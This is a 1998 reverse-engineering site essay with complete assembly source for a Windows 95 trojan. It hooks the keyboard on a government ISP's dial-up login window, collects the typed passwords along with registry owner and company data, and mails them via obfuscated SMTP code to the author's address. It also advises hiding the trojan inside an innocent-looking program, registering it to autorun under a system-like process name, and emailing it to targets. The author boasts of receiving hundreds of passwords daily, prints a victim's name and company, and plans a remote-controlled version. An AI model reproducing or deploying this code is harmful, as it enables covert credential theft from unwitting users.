Anonymity
Reverser's Anonymity Academy

Reversing Governmental Polices: Internet access for the masses
by MML

(23 September 1998)
Mighty Mole! This cracker has produced a cracking virus that keeps sending him access passwords... Not bad, not at all! This very good essay recalls the splendid essay by Yamato: Going undercover and browsing on your own proxy that I posted on my pages more than a year ago... See! A good reverser, confronted with a situation he dislikes can do ANYTHING!
But the following is not even based on the physical access to your colleagues' computers (always dangerous if you ask me).
As you can read here, MML is seeking collaboration and help, and he has very sound ideas, hope many readers will join him and develop a small ad hoc project, that the +HCU will be happy to host and support. Yet there's at the same time something, here, that really should scare you all: as you will read it is relatively easy to implement (and hyde) such techniques. Therefore the chances of finding similar virus-like code snippets inside the huge and overbloated pukeprograms by Micro$oft are quite slim for the average luser (or gizmos, as MML calls them :-)
Any good idea for implementing a global 'culprit finder' tool that we could run (for instance checking inside your target for hidden code that opens or closes sockets)? We would be well advised to perform such checks -already now- BEFORE using any new application we buy (or crack :-)? Please send, please contribute, please read and enjoy!
               Reversing Governmental Polices

		     [ MML 23 Sep 1998 ]


  The Problem = Internet Access.

     1.	In a country where best pay packages are around $600 / month, the 
	cheapest internet access is charged at $1/hour + the phone line bill. 
     2.	The cheapest internet is provided by a governmental agency, and the 
	waiting list for ordinary people is 8 months and instant excess is 
	for high ups. 
     3.	Only the internet provided by the govt. ISP could be accessed 
  	from all major cities. 

  Due to the above facts I decided to device a scheme which will solve my internet 
  access problems on a permanent basis. 

  Design Basis.

     1.	The scheme must be able to trap the access passwords in a transparent 
  	way, and I must get them wherever I am. 
     2.	The program must be compatible with all WindooZ 95 versions. 
     3.	No undocumented API may be used. 
     4.	The size of the program should be as small as possible. 
     5.	Program must provide sufficent information about the user, so that 
	only passwords belonging to govt. agencies and companies should be 
	used and no innocent user is harmed. 

  Tools.

  TASM 5.0
  Borland Resource Editor 4.5
  M$ Resource Compiler for win32
  Any Good Editor

  Details.

  To write the shortest possible program, it must be in assembly and in 
  our case asm32. First I searched all the sites related with windows 95 
  assembly and got as much information as possible. (masta_s tutorials 
  really helped. The ideal way to get password is to trap it and send it 
  to an E-mail account, when a user logs on.

  Now our program must consist of the following parts :

  1- Trapping mechanism.
  2- Routines to gather information about the user.
  3- E-mailing scheme.

  A master logic controls the functions of all of the above routines. 
  Step by Step details of the above parts are given below :

  1-Trapping mechanism :

  In the logging on scheme of this ISP, after you dial the number, a black 
  window titled "Post-Dial terminal Session" appears. One must enter two 
  different logins and passwords (for extra security :-) to enter a unix
  machine, on which a menu appears and when one presses 'p' a message 
  appears that the machine is ready for ppp. After that you must press 
  F7 and you will be logged on the network. I planned to trap all the 
  keys which are being pressed in the "Post-Dial terminal session" window. 

  By consulting windows API we can see that it provides a number of 
  HOOK functions. To install a system Wide hook, the code must reside inside 
  a dll. As given in API :

  The SetWindowsHookEx function installs an application-defined hook 
  procedure into a hook chain. An application installs a hook procedure 
  to monitor the system for certain types of events. A hook procedure can
  monitor events associated either with a specific thread or with all threads 
  in the system. 

  HHOOK SetWindowsHookEx(
  int idHook, // type of hook to install
  HOOKPROC lpfn, // address of hook procedure
  HINSTANCE hMod, // handle of application instance
  DWORD dwThreadId // identity of thread to install hook for 
  );

  Two types of hook functions were used, the first hook activates the 
  keyboard hooking function, when "Post-Dial terminal Session" window 
  is activated. The code used in the dll is given below :



  ;Some Constants

  PUBLICDLL R16052
  PAGE_READWRITE = 04h
  FILE_MAP_READ_WRITE = (2h OR 4h ) 

  extern CreateFileMappingA :PROC
  extern MapViewOfFile :PROC
  extern SetTimer :PROC
  extern KillTimer :PROC
  extern UnmapViewOfFile :PROC
  extern OpenFileMappingA :PROC

  .data 

  ;================= DLL DATA AREA ========================= 

  cwin1 db 'Post-Dial Terminal',0 ;Title of window from which keys are captured
  length1 EQU ($-offset cwin1)-1
  keybuffer db 102 dup(0) ;Keyboard buffer
  bypass dw 0
  Keyhook dd 0
  buffindex dd 0
  Killk db 0
  new_hInst dd 0
  hhook1 dd 0 ;Hook Handle
  hw dd 0
  init12 dd 0
  szTitleName db 100 dup(0)
  titlelen dd 0
  fnam db "GothMachhi4991",0
  hmapf dd 0
  mapaddr dd 0

  ;================= DLL CODE AREA ========================= 

  .code 

  Start:

  DllMain PROC g_hInst: HINSTANCE, dwReason: DWORD, lperved: PVOID 

  push ebx ecx edx esi edi
  mov ebx, dwReason
  cmp ebx, DLL_PROCESS_ATTACH
  jnz @@3
  mov eax,[g_hInst]
  mov [new_hInst],eax

  @@3:


  mov eax, 1
  pop edi esi edx ecx ebx 
  ret 

  DllMain ENDP 

  ;---------------------------------------------------------------

  R16052 PROC uses , orighwnd:DWORD , myaction:DWORD 

  push ebx ecx edx esi edi 

  cmp [myaction],1
  jz @@uninstall 

  cmp [init12],0
  jne @@14 

  mov [init12],123
  mov eax,[orighwnd]
  mov [hw],eax

  call OpenFileMappingA, FILE_MAP_READ_WRITE, FALSE, offset fnam 

  ;Actual map file is created by the main program, and here it 
  ;is being opened for data transfer between dll and main program.

  test eax,eax
  jz @@15
  mov [hmapf],eax 

  call MapViewOfFile, [hmapf], FILE_MAP_READ_WRITE, 0, 0, 0 
  test eax,eax
  jz @@15
  mov [mapaddr],eax 

  push 0 
  push [new_hInst]
  push offset HookProc 
  push WH_SHELL 

  call SetWindowsHookExA 

  cmp eax,0
  je @@15
  mov [hhook1],eax
  jmp @@14

  @@uninstall:

  call UnhookWindowsHookEx, [hhook1] 

  call UnmapViewOfFile, [mapaddr]
  call CloseHandle, [hmapf] 

  @@14:
  mov eax,1 

  @@15:
  pop edi esi edx ecx ebx 

  ret 

  R16052 ENDP 

  <<<=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=>>> 

  HookProc proc uses ebx edi esi, nCode:DWORD, wparam1:DWORD, lparam1:DWORD 

  cmp nCode,0
  jl @@14 

  cmp [bypass],0DADh
  je @@15 

  cmp nCode,HSHELL_REDRAW
  jne @@14 

  call CheckTitle
  test eax,eax
  jnz @@13

  mov [bypass],0DADh 

  call SetWindowsHookExA, WH_KEYBOARD, offset KeyHookProc, [new_hInst], 0 

  cmp eax,0
  je @@error
  mov [Keyhook],eax
  jmp @@13 

  @@error:
  mov eax,0FFFFFFFFh
  mov [bypass],0 

  @@13:
  mov ecx,[titlelen]
  mov eax,0 
  mov edi,offset szTitleName
  cld
  rep stosb 

  @@14:
  call callNextHookEx, [hhook1], [nCode], [wparam1], [lparam1] 

  ret 

  @@15:
  cmp nCode,HSHELL_WINDOWDESTROYED
  jne @@14 

  call CheckTitle
  test eax,eax
  jnz @@13 

  call UnhookWindowsHookEx, [Keyhook] 

  mov eax,[buffindex]
  mov ecx,eax
  push ecx
  mov esi,offset keybuffer
  mov edi,[mapaddr]
  push edi
  cld
  inc edi
  inc edi
  repne movsb 

  pop edi
  pop ecx
  mov word ptr [edi],cx

  mov [bypass],0
  mov [Killk],0 

  jmp @@13 

  HookProc endp 

  <<<=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=>>> 

  CheckTitle proc 

  call GetWindowTextLengthA , [wparam1]
  inc eax 

  mov [titlelen], eax
  call GetWindowText,[wparam1],offset szTitleName,eax 

  lea esi, cwin1
  lea edi, szTitleName
  mov ecx, length1
  repe cmpsb
  jne @@notEq
  jmp @@equal


  @@notEq:


  mov eax,1 
  ret


  @@equal:
  mov eax,0
  ret 

  CheckTitle endp 

  <<<=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=>>> 

  KeyHookProc proc uses ebx edi esi, nCode:DWORD, wparam1:DWORD, lparam1:DWORD 

  cmp nCode,0
  jl @@13 

  mov eax,lparam1
  test eax,80000000h
  jz @@13 

  cmp [Killk],5
  jz @@13 

  mov edx,[buffindex]
  mov eax,[wparam1]
  mov edi,offset keybuffer 
  add edi,edx
  mov byte ptr[edi],al
  inc [buffindex]
  cmp [buffindex],100 

  jae @@15 

  @@13:
  call callNextHookEx, [hhook1], [nCode], [wparam1], [lparam1] 

  ret 

  @@15:
  mov [Killk],5
  jmp @@13 

  KeyHookProc endp 

  <<<=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=>>>
  End Start



  As you may have noted I haven't commented much the code, that is 
  because it is not ment for total gizmos. A brief summary of the 
  actions which the code is doing is given below :

  A shell hook WH_SHELL is installed. It monitors the title of every 
  window being activated. When our target window becomes activated, 
  it installs the keyboard hook procedure, which captures the key 
  strokes. When the window is closed (F7 pressed) the shell hook 
  procedure sets a byte in the mapping file, (mapping file is being
  continuously monitored by the main program). When the main program 
  reads that particular byte its sends the keys via SMTP mail.

  A single data area is being used for all the instances of 
  the dll. (This must be mentioned in the def file).

   

  2-Routines to send E-mail :

  The main program is given below :



  .data

  ;================ MAIN FILE DATA ================================

  newhwnd  dd      0
  msg              MSGSTRUCT      <?>
  wc               WNDCLASS       <?>

  hInst    dd      0
  szClassName             db      'ASMCLASS32',0


  Mydllname               db      "xyz.dll",0
  MydllHwnd               dd      0
  Mydllfunctionname       db      "R16052",0
  Mydllfunctionadd        dd      0

  fnam     db      "GothMachhi4991",0
  hmapf    dd      0
  mapaddr  dd      0
  keymaillen              dd      0
  keymailbase             dd      0
  ipaddbase               dd      0
  iplen    dd      0
  bypass   db      0
  try      db      0
  newlogicp               db      0
          
  ;=============== REGISTRY DATA ==================================

  subkeyval       db      'RemoteAccess'
  n               db      0
                  db      'Profile\'
  reglen          equ     $-offset subkeyval

  n1              db      80 dup(0)
  val1            db      'Default',0

  phkresult       dd      0
  dwtype          dd      0
  rkbuff          db      80 dup(0)
  rknum           dd      80
  rknum1          dd      12

  userb           db      60 dup(0)
  compb           db      60 dup(0)
  userl           dd      59
  compbl          dd      59


  key             db      055h,054h,012h,095h,056h,0d0h,015h,0d1h,097h
                  db      0d3h,0dah,059h,01dh,05ch,05dh,05ch,01ah,09dh,097h
                  db      056h,0dah,01ch,099h,05ch,05eh,05dh,097h,051h,0ddh
                  db      01dh,01dh,0d9h,01ch,09dh,016h,0d9h,01dh,05dh,0dah
                  db      05ch,01ch,080h,080h
           ;------>SOFTWARE\Microsoft\Windows\CurrentVersion

  val2            db      015h,0d9h,05ah,0dah,05dh,09dh,0d9h,01dh,0d9h,099h
                  db      054h,05eh,01ch,0d9h,01dh,080h,080h
           ;------>RegisteredOwner

  val3            db      015h,0d9h,05ah,0dah,05dh,09dh,0d9h,01dh,0d9h,099h
                  db      054h,01dh,05ah,0d8h,01ch,0dah,01fh,0d8h,09dh,0dah
                  db      05ch,01ch,080h,080h
           ;------>RegisteredOrganization

  tkeylen         =       $-offset key

  ;================ WINSOCK DATA ==================================

  wsa      WSADATA <?>
  hserver         dd      0
  addr     SOCKADDR_IN <?>

  databuff        db      70h dup(0)

  helo            db      092h,0d1h,093h,054h,088h,09ch,0d8h,05bh,01ch,0d9h
                  db      0c3h
                  db      03h
           ;--------------->'HELO abc.xyz.com',0dh,0ah
  helolen         equ     $-offset helo

  mailfrm         db      0d3h,0d0h,0d2h,093h,088h,012h,015h,054h,0d3h,0fh

           ;------------>'MAIL FROM: 123@xyz.com',0dh,0ah
  mailfrmlen      equ     $-offset mailfrm

  rcptto          db      015h,051h,094h,095h,088h,095h,054h,0fh,088h,01dh
           ;-------->'RCPT TO: abc@123.net',0dh,0ah

  rcpttolen       equ     $-offset rcptto

  cdata           db      091h,0d0h,095h,0d0h,0c3h,03h
           ;--------->'DATA',0dh,0ah
  cdatalen        equ     $-offset cdata

  qmail           db      0d4h,0d5h,0d2h,095h,0c3h,03h
           ;--------->'QUIT',0dh,0ah
  qlen            equ     $-offset qmail

  subject         db      05dh,0ddh,019h,01bh,0d9h,059h,09dh,088h,0fh
  rsub            db      45 dup(88h)
                  db      0c3h,03h
           ;------> subject : xxxxxxxxxxxxxx
  subjectlen      equ     $-offset subject

  totallen        equ     $-offset helo

  fdata           db      0dh,0ah,'.',0dh,0ah

  ecount          db      3

  ipofhost        dd      01234567h ;IP address of your SMTP server
  ;==================================================================


  .Code

  Main:
          push    L 0
          call    GetModuleHandleA        ; get hmod (in eax)
          mov     [hInst], eax            ; hInstance is same as HMODULE
				          ; in the Win32 world

          mov     [wc.clsStyle], CS_HREDRAW + CS_VREDRAW + CS_GLOBALCLASS
          mov     [wc.clsLpfnWndProc],offset WndProc
          mov     [wc.clsCbClsExtra], 0
          mov     [wc.clsCbWndExtra], 0

          mov     eax,[hInst]
          mov     [wc.clsHInstance], eax

          mov     [wc.clsHbrBackground], COLOR_WINDOW + 1
          mov     dword ptr [wc.clsLpszMenuName], 0
          mov     dword ptr [wc.clsLpszClassName], offset szClassName

          push    offset wc
          call    RegisterClassA

          push    L 0       ; lpParam
          push    [hInst]   ; hInstance
          push    L 0       ; menu
          push    L 0       ; parent hwnd
          push    L CW_USEDEFAULT          ; height
          push    L CW_USEDEFAULT          ; width
          push    L CW_USEDEFAULT          ; y
          push    L CW_USEDEFAULT          ; x
          push    L WS_OVERLAPPEDWINDOW    ; Style
          push    0         ;offset szTitleName       ; Title string
          push    offset szClassName       ; Class name
          push    L 0       ; extra style

          call    CreateWindowExA

          mov     [newhwnd], eax

   msg_loop:
          push    L 0
          push    L 0
          push    L 0
          push    offset msg
          call    GetMessageA

          cmp     ax, 0
          je      end_loop

          push    offset msg
          call    TranslateMessage

          push    offset msg
          call    DispatchMessageA

          jmp     msg_loop

  end_loop:

          push    [msg.msWPARAM]
          call    ExitProcess

  ;-----------------------------------------------------------------------------

  WndProc          proc uses ebx edi esi, hwnd3:DWORD, wmsg:DWORD, wparam:DWORD, lparam:DWORD

  ;--------;;;;;Win32 requires that EBX, EDI, and ESI be preserved!  

          
          LOCAL   theDC:DWORD

          cmp     [wmsg], WM_DESTROY
          je      wmdestroy
          
          cmp     [wmsg], WM_CREATE
          je      wmcreate
          
          cmp     [wmsg],WM_TIMER
          je      wmtimer

          jmp     defwndproc

  wmcreate:
          
     mov     byte ptr [try],3
                  
     call    CreateFileMappingA, 0ffffffffh, NULL, PAGE_READWRITE , 0, (1024*3), offset fnam
     test    eax,eax
     jz      @@force
          
     mov     [hmapf],eax

     call    MapViewOfFile, [hmapf], FILE_MAP_READ_WRITE, 0, 0, 0 ;FILE_MAP_ALL_ACCESS
     test    eax,eax
     jz      @@f1

     mov     [mapaddr],eax

          mov     edx,eax
          xor     eax,eax
          mov     [edx],eax       

          call    SetTimer, [hwnd3], 1, 1000, NULL

          call    LoadLibraryA, offset Mydllname
          mov     MydllHwnd, eax

          call    GetProcAddress, [MydllHwnd], offset Mydllfunctionname
          mov     Mydllfunctionadd, eax

          call    [Mydllfunctionadd], [hwnd3],0   
          cmp     eax,0
          jz      wmdestroy

          jmp     finish


  wmtimer:
          cmp     byte ptr [bypass],1
          jz      @@newlogic

          mov     eax, [mapaddr]
          cmp     word ptr [eax],0
          jz      finish
          call    KillTimer, [hwnd3], 1
          
          call    SendMeData
          call    QDEmail
          cmp     eax,0
          jz      wmdestroy

          mov     [bypass],1
          call    SetTimer, [hwnd3], 1, (60*1000*5), NULL
          jmp     finish

  @@newlogic :
          
          cmp     byte ptr[newlogicp],1
          jz      @@f
          dec     byte ptr [try]
          cmp     byte ptr[try],0
          jz      wmdestroy

          mov     byte ptr[newlogicp],1
          call    QDEmail
          cmp     eax,0
          jnz     @@f2
          call    KillTimer, [hwnd3], 1             

          jmp     wmdestroy
          
  @@f2:
          cmp     [try],1
          jnz     @@13
          mov     [ipofhost],abcdefgh     ;abcdefgh=alternate IP address

  @@13:
          mov     byte ptr[newlogicp],0

  @@f:
          jmp     finish            


  wmdestroy:

          call    [Mydllfunctionadd], [hwnd3],1

          call    UnmapViewOfFile, [mapaddr]

  @@f1:

          call    CloseHandle,     [hmapf]
                  
  @@force:

          push    L 0
          call    PostQuitMessage
          mov     eax, 0
          jmp     finish


  defwndproc:
          push    [lparam]
          push    [wparam]
          push    [wmsg]
          push    [hwnd3]
          call    DefWindowProcA
          jmp     finish


  finish:
          ret

  WndProc          endp
  ;-------------------------------------------------------



  HexWrite8 proc
  ;
  ; AL has two hex digits that will be written to ES:EDI in ASCII form
  ;

          mov     ah, al
          and     al, 0fh
          shr     ah, 4
                   ; ah has MSD
                   ; al has LSD
          or      ax, 3030h
          xchg    al, ah
          cmp     ah, 39h
          ja      @@4
  @@1:
          cmp     al, 39h
          ja      @@3
  @@2:
          stosw
          ret
  @@3:
          sub     al, 30h
          add     al, 'A' - 10
          jmp     @@2
  @@4:
          sub     ah, 30h
          add     ah, 'A' - 10
          jmp     @@1

  HexWrite8 endp

  <<<=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=>>>

  QDEmail         proc uses ebx edi esi

          mov     byte ptr[ecount],2

          call    WSAStartup, 101, offset wsa`    
          test    eax, eax
          jnz     @@Error

          call    socket, AF_INET, SOCK_STREAM, 0
          cmp     eax,0ffffffffh
          jz      @@Error
          mov     [hserver],eax
          
          mov     [addr.sin_port], 1900h          ;No need to call htons (19h->1900h)
          mov     [addr.sin_family],AF_INET
          mov     eax,[ipofhost]
          mov     [addr.sin_addr],eax             ;host Ip in hex 

  @@again:        
          call    connect, [hserver], offset addr, 010h
          test    eax,eax
          jz      @@continue

          call    WSAGetLastError
          cmp     [ecount],0
          jz      @@Error1
          dec     [ecount]

          jmp     @@again
  @@continue:

          call    recv, [hserver], offset databuff, 70h, 0 
          test    eax,eax
          jz      @@Error1
          cmp     [databuff],'3'
          ja      @@Error1
          
          call    Decrypt, totallen, offset helo

          call    send, [hserver], offset helo, helolen,0
          call    recv, [hserver], offset databuff, 70h, 0
          test    eax,eax
          jz      @@Error1
          cmp     [databuff],'3'
          ja      @@Error1

          call    send, [hserver], offset mailfrm, mailfrmlen,0   
          call    recv, [hserver], offset databuff, 70h, 0
          test    eax,eax
          jz      @@E1
          cmp     [databuff],'3'
          ja      @@E1

          call    send, [hserver], offset rcptto, rcpttolen,0
          call    recv, [hserver], offset databuff, 70h, 0
          test    eax,eax
          jz      @@E1
          cmp     [databuff],'3'
          ja      @@E1

          call    send, [hserver], offset cdata, cdatalen,0
          call    recv, [hserver], offset databuff, 70h, 0
          test    eax,eax
          jz      @@E1
          cmp     [databuff],'3'
          ja      @@E1

          call    send, [hserver], offset subject, subjectlen,0
          call    send, [hserver], [Keymailbase], [Keymaillen],0 ;Send Key Codes
          call    send, [hserver], offset fdata, 2,0 ;---> CR/LF
          
          cmp     [rknum],0
          jz      @@nosend
          
          call    send, [hserver], [IPaddBase], [IPlen],0 ;Send Registry Default IP
          call    send, [hserver], offset fdata, 2,0 ;---> CR/LF

          call    send, [hserver], offset userb, [userl],0 ;Send Registry User Name
          call    send, [hserver], offset fdata, 2,0 ;---> CR/LF

          call    send, [hserver], offset compb, [compbl],0 ;Send Registry Company
          call    send, [hserver], offset fdata, 2,0 ;---> CR/LF
  @@nosend:

          cmp     [rknum1],0
          jz      @@nosend1
          
          call    send, [hserver], offset subkeyval,[rknum1],0 ;Send Registry ISP name
          call    send, [hserver], offset fdata, 2,0      

  @@nosend1:
          
          call    send, [hserver], offset fdata, 5,0      ;Finish sending data

          call    recv, [hserver], offset databuff, 70h, 0
          test    eax,eax
          jz      @@E1
          cmp     [databuff],'3'
          ja      @@E1

          call    send, [hserver], offset qmail, qlen,0
          call    recv, [hserver], offset databuff, 70h, 0

  @@E1:
          call    closesocket, [hserver]
          call    WSACleanup
          
          mov     eax,0
          ret
  @@Error1:
          
          call    closesocket, [hserver]
          call    WSACleanup

  @@Error:
          mov     eax,1    
          ret


  QDEmail         Endp

  <<<=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=>>>

  GetDefaultIP    Proc uses ebx edi esi

          call    RegOpenKeyExA, HKEY_CURRENT_USER, offset subkeyval,\
                   0,KEY_ALL_ACCESS, offset phkresult
          cmp     eax,ERROR_SUCCESS
          jnz     @@ga1
           
          call    RegQueryValueExA, [phkresult], offset val1\
                    , 0, offset dwtype, offset rkbuff, offset rknum
          test    eax,eax

          call    RegCloseKey, [phkresult]

          
          mov     [n],'\'
          mov     ecx,[rknum]
          mov     edx,ecx
          mov     edi,offset n1
          mov     esi,offset rkbuff       
          repne   movsb
          
          dec     edx
          add     edx,reglen
          mov     [rknum1],edx

          mov     byte ptr[val1],'I'
          mov     byte ptr[val1+1],'P'
          mov     byte ptr[val1+2],0

          mov     [rknum],60

          call    RegOpenKeyExA, HKEY_CURRENT_USER, offset subkeyval,\
                   0,KEY_ALL_ACCESS, offset phkresult
          cmp     eax,ERROR_SUCCESS
          jnz     @@getaway

          call    RegQueryValueExA, [phkresult], offset val1\
                    , 0, offset dwtype, offset rkbuff, offset rknum
          
          call    RegCloseKey, [phkresult]
  ;-------------------------------------------------------------------
          
          call    Decrypt,tkeylen, offset key
   
          call    RegOpenKeyExA, HKEY_LOCAL_MACHINE, offset key,\
                   0,KEY_ALL_ACCESS, offset phkresult
          cmp     eax,ERROR_SUCCESS
          jnz     @@jmp

          call    RegQueryValueExA, [phkresult], offset val2\
                    , 0, offset dwtype, offset userb, offset userl
          dec     [userl]

          call    RegQueryValueExA, [phkresult], offset val3\
                    , 0, offset dwtype, offset compb, offset compbl
          dec     [compbl]

          call    RegCloseKey, [phkresult]
  ;------------------------------------------------------------------

  @@jmp:
          
          ret

  @@ga1 :

          mov     [rknum1],0

  @@getaway:
          
          mov     [rknum],0

          ret


  GetDefaultIP    Endp


  <<<=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=>>>

  SendMeData      Proc

          mov     eax, [mapaddr]
          movzx   ecx,word ptr[eax]
          mov     esi,eax
          
          add     eax,ecx
          inc     eax
          inc     eax
          inc     eax

          inc     esi
          inc     esi

          mov     edi,eax
          
          push    ecx
          push    edi

  @@again:

          push    esi edi
          mov     al,byte ptr[esi]
          call    HexWrite8
          pop     edi esi

          inc     esi
          inc     edi
          inc     edi
          loop    @@again
          
          mov     byte ptr[edi],0dh
          inc     edi
          mov     byte ptr[edi],0ah
          inc     edi
          mov     byte ptr[edi],'I'

          pop     edi
          pop     ecx
          inc     ecx
          shl     ecx,1
          inc     ecx

          mov     [Keymailbase],edi
          mov     [Keymaillen],ecx

          call    GetDefaultIP

          mov     ecx,[rknum]
          cmp     ecx,0
          jz      @@ret
          
          mov     edi, [Keymailbase] 
          mov     eax, [Keymaillen]
          add     edi,eax
          mov     [IPaddBase],edi

          inc     ecx
          shl     ecx,1
          mov     [IPlen],ecx

          shr     ecx,1
          dec     ecx

          mov     esi,offset rkbuff
          
  @@again1:

          push    esi edi
          mov     al,byte ptr[esi]
          call    HexWrite8
          pop     edi esi

          inc     esi
          inc     edi
          inc     edi
          loop    @@again1

          mov     byte ptr[edi],0dh
          inc     edi
          mov     byte ptr[edi],0ah


  @@ret:
          
          ret

  SendMeData      Endp

  <<<=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=>>>

  Decrypt         Proc    data_length:DWORD, start:DWORD

          mov     ecx,data_length
          xor     eax,eax
          mov     esi,offset start

  @@again:
          mov     al,byte ptr[esi]
          rol     al,1
          dec     al
          rol     al,1
          mov     byte ptr[esi],al
          inc     esi
          loop    @@again

          ret


  Decrypt         Endp
  <<<=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=>>>

  End Main         ;end of code, JUMP-spot (main)



  Most of the code is self explainatory. But you may like to note the 
  following details :

  1- The data is encrypted so that any gizmo may not be able to see 
     the text via HEX editor.

  2- Two Redirectable E-mail accounts were made on internet (There are 
     hundert of them freely available).

  3- Both from and to addresses must be on different places, so that 
     bounced back messages are not lost.

  4- Main program tries to send the mail a number of times, if unsuccessful 
     it tries an alternate SMTP server. If successful the program quits 
     normally.

  5- No Show window function is included in the main code.

  6-Program opens a mapping file to communicate with the dll. A timer 
    function is installed which monitors the first bytes of this mapping 
    file, if these bytes are changed (i-e signal from dll that the keys 
    are ready for sending) the program sends the trapped data along with 
    some interesting registery keys.

  Compilation results :

  Both the dll and exe were compiled with TASM. The file size for each 
  was 8k (Only). Actually the size is much smaller than 8K but I think 
  that the minimum size of 8k is some how related with my HD cluster size.

  Program Deployment:

  These two files are so small that they can be included with any 
  program (as resource data etc.). The front end of the program can be 
  any thing (like a poem etc.). 

  The front end program copies these files in the default windows directory 
  and enters its name in the auto run key of registery. As the program name 
  appears in the Ctrl-Alt-Del list, so it must be like some background process 
  (osa.exe, rnaapp etc).

  The total uncompressed size of my front end + these files was 24 K. (which 
  reduced to 6K in zip file). Programs of this size can be eaisly sent via 
  E-mail to your targets.

  Results :

  I wrote this program in june 1998 and it has been several months since 
  it is in the open. I receive now HUNDRED of passwords daily (even powerful 
  shell accounts of ISP themselves).

  A typical result is given below :

  414234564A410D52414E493432300D50
  I
  1C000000000000000000000000000000000000000000000000000000

  Shahnawaz Gugher
  Falcon computers
  RemoteAccess\Profile\My Connection 4

  Which gives the us the password in scan code form in the first line. 
  A simple program can be written to decrypt it. 

  Lessons to be Learnt :

     1.Every Reverser must check the programs which he receives. 
     2.As I have noted that my program takes only a fraction of a second 
       to send the mail, so we must check every program from Micro$oft etc. 
       for similar code. 

  Further research :

  As I currently have no control over the program, it sends mail every 
  time the user connects. So in future versions i am thinking of a http 
  based trapper.

  - The program will trap the keys, then connect to a web address and 
    receive further instructions about what to to do next.

  The next important thing which i want to do is to make this program 
  capable of trapping the passwords which are in pwl files or for the 
  connection sechemes in which "Post dial terminal window" is not required.

  Any one interested in the above projects is welcome to contact me 
  at -mml-@iname.com

MML

You'r deep inside reverser's pages of reverse engineering, choose your way out
Anonymity
Reverser's Anonymity Academy
homepage links redanonymity +ORC tools counter measures
students' essays cocktails search_forms antismut mail_reverser
Is reverse engineering legal?